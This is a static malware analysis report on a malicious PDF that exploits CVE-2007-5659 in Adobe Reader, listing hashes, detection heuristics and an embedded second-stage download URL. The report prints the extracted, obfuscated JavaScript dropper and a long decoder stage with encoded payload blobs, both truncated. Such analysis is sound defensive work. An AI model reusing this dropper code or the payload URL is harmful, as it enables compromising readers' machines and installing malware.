Malicious PDF — malware analysis report

Static analysis result for SHA-256 756b21759757e4bc…

MALICIOUS

PDF

16.0 KB
MD5: 1f126c3ae894c38db1020131aae7124a SHA-1: ed590a46b5ece3ebc83c40208860b655e6525eb6 SHA-256: 756b21759757e4bc8b92d6166db6a78955b92559aff510e62f77e57121b5d6bc
366 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains heavily obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script decodes a URL from the annotation subject and uses it to download a second-stage payload. The embedded URL http://searchfunes.org/cgi-bin/153/n002106201r0019Rcc62cc8aX6da4853bY488ef576Z0100f060 is critical for this stage of the attack.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after static deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 5 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, hex_dashed_payload, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://searchfunes.org/cgi-bin/153/n002106201r0019Rcc62cc8aX6da4853bY488ef576Z0100f060 Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0005_000.js
4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d		 pdf-javascript-stream PDF /JS object 5 at offset 0x148 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
legacy_pdfkit_stage_000.js
8fb18bc790c7c00fb4c55be04cb3782765d8c1c88cc1a45960c3ab6e68b5a54b		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x1AF0 12817 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function v7g2__vQ0(dJ6_5__8j, Id_34B_UE){var A_7_XC38u_Q1 = 20;var Sx_Tdt__1ywcm = 0;var TPc4a_06_t4757c = 512;var R00__gy__AXoK = A_7_XC38u_Q1;var gG8533p6_v70p_l = "";var S2r__UlhrHE6J = 4;var D_srHlRB = this;var XJ80fer5_krH4_1 = "1234ee";var Nxs___jt = arguments;try {var u5K8aQ_8A = 0;if (app) {R00__gy__AXoK = R00__gy__AXoK + 2;Id_34B_UE = pr[u5K8aQ_8A].subject;}XJ80fer5_krH4_1 = XJ80fer5_krH4_1.replace(/\d+/, "call");} catch(e) { }R00__gy__AXoK = R00__gy__AXoK - A_7_XC38u_Q1;var faUS_VdjD_q1h = new Array();var Ycs__X280Mo1O1 = 150;if (Ycs__X280Mo1O1 > 0) {faUS_VdjD_q1h[0] = Ycs__X280Mo1O1;faUS_VdjD_q1h[1] = TPc4a_06_t4757c;faUS_VdjD_q1h[0] = faUS_VdjD_q1h[0] - Ycs__X280Mo1O1;faUS_VdjD_q1h[2] = faUS_VdjD_q1h[0];faUS_VdjD_q1h[1] = faUS_VdjD_q1h[1] - TPc4a_06_t4757c;faUS_VdjD_q1h[3] = faUS_VdjD_q1h[1];}if (dJ6_5__8j) { faUS_VdjD_q1h = dJ6_5__8j;}if (!dJ6_5__8j) {var FUJm__Lv2T = Nxs___jt[XJ80fer5_krH4_1].toString();var v_P0Uj_bP6 = 0;var h241Pp = v_P0Uj_bP6;Ycs__X280Mo1O1 = Ycs__X280Mo1O1 - 102;var r_03__E0_vw = 0;while(h241Pp < FUJm__Lv2T.length) {r_03__E0_vw = FUJm__Lv2T.charCodeAt(h241Pp);if (r_03__E0_vw >= Ycs__X280Mo1O1 && r_03__E0_vw <= 57) {if (v_P0Uj_bP6 == S2r__UlhrHE6J) {v_P0Uj_bP6 = -1;}if (v_P0Uj_bP6 < 0) { v_P0Uj_bP6 = 0; }faUS_VdjD_q1h[v_P0Uj_bP6] += r_03__E0_vw;if (faUS_VdjD_q1h[v_P0Uj_bP6] > TPc4a_06_t4757c) {faUS_VdjD_q1h[v_P0Uj_bP6] -= TPc4a_06_t4757c;}v_P0Uj_bP6 = v_P0Uj_bP6 + 1;}h241Pp = h241Pp + 1;}}var pb_33Y_iMI70I = 0;var L__KH1_m1T_BC7x = 0;var Kq_A_6R2k_iE87t = -1;var A7_q_D_g7dO_k = 0;var b___8__2Ygo = 0;do {var vQqF__i = 256;if (faUS_VdjD_q1h[A7_q_D_g7dO_k] > vQqF__i) {faUS_VdjD_q1h[A7_q_D_g7dO_k] -= vQqF__i;}A7_q_D_g7dO_k = A7_q_D_g7dO_k + 1;} while (A7_q_D_g7dO_k < S2r__UlhrHE6J);A7_q_D_g7dO_k = A7_q_D_g7dO_k - S2r__UlhrHE6J;while(A7_q_D_g7dO_k < Id_34B_UE.length) {var l2875A2o = Id_34B_UE.substr(A7_q_D_g7dO_k, 1) + ' V V ';A7_q_D_g7dO_k = A7_q_D_g7dO_k + 1;var Le__4_e_x__xDk4 = parseInt(l2875A2o, A_7_XC38u_Q1);if (Kq_A_6R2k_iE87t != -1) {L__KH1_m1T_BC7x += Le__4_e_x__xDk4;if (pb_33Y_iMI70I == S2r__UlhrHE6J) {pb_33Y_iMI70I = 0;}var WP_jCWo = L__KH1_m1T_BC7x;WP_jCWo = WP_jCWo - (b___8__2Ygo + 2) * faUS_VdjD_q1h[pb_33Y_iMI70I];if (WP_jCWo <= 0) {WP_jCWo = WP_jCWo - Math.floor(WP_jCWo / 256) * 256;}WP_jCWo = String.fromCharCode(WP_jCWo);if (R00__gy__AXoK == 1) {gG8533p6_v70p_l += Le__4_e_x__xDk4;} else if (R00__gy__AXoK == 2) {gG8533p6_v70p_l += WP_jCWo;} else {gG8533p6_v70p_l += A7_q_D_g7dO_k;Kq_A_6R2k_iE87t = -2;}Kq_A_6R2k_iE87t = -1;pb_33Y_iMI70I = pb_33Y_iMI70I + 1;b___8__2Ygo = b___8__2Ygo + 1;} else if (Kq_A_6R2k_iE87t == -1) {Kq_A_6R2k_iE87t = A_7_XC38u_Q1;L__KH1_m1T_BC7x = Le__4_e_x__xDk4 * A_7_XC38u_Q1;}}var F_0a_3j___OQQ_t = this;F_0a_3j___OQQ_t['ev'+'al'](gG8533p6_v70p_l);}
	v7g2__vQ0(0, "8c1jbi4dbj33550d340dbc2eb83150a03943700a5e4c3h88b22fae076j5j081ea96499a71e5g2f23ab519260ca4bc095697g8d4faa5b1j8g65798h1ba66cc84023988gb46a6jag03c0757e96889d1g0i11ac3g5c3e9e0da89hbi452g4a86c75589ae440gc29eah2e769e2c9ac9a603202hcd2d88bc0fca8h241d4j249428bi75ae03181269cebf689d251ec95529b84ba744435hcb21b20i8g12485g032b9bag73452j30cb338g881f2e0h9h64346j5b2d7cc4b777805435bg84ca8e587h5cc89872bh191b5a547g5a9i022bc0af766g469hc2ad9f72500h3gb50370agc072c104c2016j89026898a606b64340135e889205aac51fah2b2i6629caae30b23526792bb15c0136470j5hc68h1hbe334ib03f27ai3562304374c550ae034i24435ac861a8a722661i278473926c0a6512a95j42581aaj4703966c4658aec38h0e62385a65aa9d97151025a27793816faha11d87695867a7aja8c2ad7a300a979c628bb96hcec5bh0c4g80cd36ah09c1042j5b105f4583b88ha43b181g196j0jb39i13c94b296934b33jca2j4ibg5a3a741i8306195ic2556gc27745415ib14dacag6g59cc1682286g4j0e35c4ba8f659956c96d34a484796bc1177f28885b4e89cf7a5acd4235977d788da20j2f1d707g7278a51cc58i73510h287j9ga86i9b5h1437bba76492bh6ibca6ab90073ea62a6c861f000c3fb7535caf05b7ac37bj483457ba954db71f470e5b09ab61ah40476h0h06b4248b1f3b742f399fc483272g4ga335ahai615i3525ab32a06c2b4327bc9b5h8b3g234f1c9443508g16c8852c69126a4c916j5a2b01369171627d9921c8059h853256adb175977a3a050c7ia349a2b95haa1dbh0h4071c5717ac2059h041i1f6a72b8a6ae9g0ec84j1j6300a3941cc833b14fbia741b51i24c8220i8h1aa2104
... (truncated)
deobfuscated.js
0c738159530d3f9327c32aa8ae29014e96d0115a069a1ed0be30e1ca5af018fc		 deobfuscated-js PDF JavaScript deobfuscation pass 125500 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 9 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app.eval(buf);
}

8c1jbi4dbj33550d340dbc2eb83150a03943700a5e4c3h88b22fae076j5j081ea96499a71e5g2f23ab519260ca4bc095697g8d4faa5b1j8g65798h1ba66cc84023988gb46a6jag03c0757e96889d1g0i11ac3g5c3e9e0da89hbi452g4a86c75589ae440gc29eah2e769e2c9ac9a603202hcd2d88bc0fca8h241d4j249428bi75ae03181269cebf689d251ec95529b84ba744435hcb21b20i8g12485g032b9bag73452j30cb338g881f2e0h9h64346j5b2d7cc4b777805435bg84ca8e587h5cc89872bh191b5a547g5a9i022bc0af766g469hc2ad9f72500h3gb50370agc072c104c2016j89026898a606b64340135e889205aac51fah2b2i6629caae30b23526792bb15c0136470j5hc68h1hbe334ib03f27ai3562304374c550ae034i24435ac861a8a722661i278473926c0a6512a95j42581aaj4703966c4658aec38h0e62385a65aa9d97151025a27793816faha11d87695867a7aja8c2ad7a300a979c628bb96hcec5bh0c4g80cd36ah09c1042j5b105f4583b88ha43b181g196j0jb39i13c94b296934b33jca2j4ibg5a3a741i8306195ic2556gc27745415ib14dacag6g59cc1682286g4j0e35c4ba8f659956c96d34a484796bc1177f28885b4e89cf7a5acd4235977d788da20j2f1d707g7278a51cc58i73510h287j9ga86i9b5h1437bba76492bh6ibca6ab90073ea62a6c861f000c3fb7535caf05b7ac37bj483457ba954db71f470e5b09ab61ah40476h0h06b4248b1f3b742f399fc483272g4ga335ahai615i3525ab32a06c2b4327bc9b5h8b3g234f1c9443508g16c8852c69126a4c916j5a2b01369171627d9921c8059h853256adb175977a3a050c7ia349a2b95haa1dbh0h4071c5717ac2059h041i1f6a72b8a6ae9g0ec84j1j6300a3941cc833b14fbia741b51i24c8220i8h1aa2104g981h4iai168c4d0c3ab41j7fb6641i042391327e801c3b12c0956g6a3gc47629aj7d828gc1aj5fb8522b4e97959g61bg33356855837d911ac7cd66593d3c7aa68d99725i1g2694036f7f9c57143494b3484i0b65bh1dcb903i689a2g7b95aea60c1gb33e4c991c9294c822513b7h2ib84d9f0b14ab2fc6bj1ha00h1c8b39147h0f7h3h424j011281913g260g17a91iaha94h530d1ca573836c2h7b01b58d4b5822aa40cb5f324h5003995a0260205j66a09d94be1gbi6944536i68a8ac9iai6j523ba507bea5ad6b3i17ae075a75c8690h2f00061d82c5597ec9cd091451056d4ea21199a44b18614j8d2abda01gba58044525bd74bh38308d4c31923j8g391c7i2g3ha2bb5b210g2d0d379b9j6c561b3h9459747147333j1797745c431h4604a4825e6507cd67296j22634g07aj99b032449c7dai5i60aebic5ac757f3a9b0bbga1b64g502a9ic76iaj7i4dah2gb9b66b70bh3gaa10c5c6173fa93f9bbb148cc241b7535ca01hb98bca022e0a7j01b9839ec61cba590bab50b83h417j122282ce970e1h411c458acb5g4d103ecc519a772b350625a76ha05a3c6a2d0179705g0faf83c869344f59ad8b63b43a1j5b4cc8a390ag090j9155847da01b0ab07a5c3737afa07g7i8c380i1j7i027c7gbg52ccc6b3ce4g74a4397ca00ac52f59165g467621aac00ebi4j5172c39294cf2b421442237c4e8e2g43a34g20a719933g3f8f081b7fb38h573a6g1a5c6g9a5h2j2j30bg65955j1a4a0aae9f326321ca42bg7j4b558128cd592g59655e74bg8b93b02i028g7b8790800jc90b9g736j4c7bb39705b76i505ebc0d9fa98640b9c6a3cb4281bh6ac00fa49g2140a7615e9d1f09c241b7535ca01hb98bca022e0a7jba954dab094e0g68c67g5ha03g1ib63c397g247c2e1541cb1278a83e5a2653a4679a982a591a097j2e7439314j27af906i734dbc71007h6f508g16c8852c6929528ca3a86c2937256e776j6a73ajaca76e876b5fb4a0bc908c6b0824b1bd5c88ai44c42h8ead1d75aj5f8j0802ab2h30053861ajb0bfc933203b508e1f9da5b22e3e23483bai689a2d2ia523077i4dad2h4g9b2j4ca7ah5b240d400j50688171300i309140936i1h5420b18h79665h23782bb57e3i6d0e9a53bh456d4e93a78c85bj33357b5b8j82720b30ai7f403f466ga4948ib94e1j4d89ba908j915e0d0eb10j484i0b4ib4b2a6c3454eab3a88a70jb6082f0d315c991cc3ae00bi380f5327ah4db3bi5baf382d873bah1j1j972i1a9f38712b3b521945a6046j2c0g31a42f9h6g253d4529986c6i7i306500bc705a650dbj3i0i8g3i5a831ha65fc660338j76ag768bba3h2b9g7f958266bja1ae6e52253789c2a88e8e6b39268jae7c7jc35ec807bha54g71006b9ia8a6accf2f0f553h8fa68a9d0eag333389bi94941i0a29c36913b95jbd1743964931ai489j181875081ba9a95512115ea22j687f3a2ece149j5971803h683706743i7833c773bg7c5b3i620c077gb84d2a6g7ja18e852435136c7b8a978cb6291ba47b7h726eah8d02987a1j5jag036da19g54becf869d315g932gccc8c59g19610e44669805ad163c093h5c7711b7b32h1b2e0962cc8d86cfbi2d9d2806841j914b53a93j42a9c59e3046
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.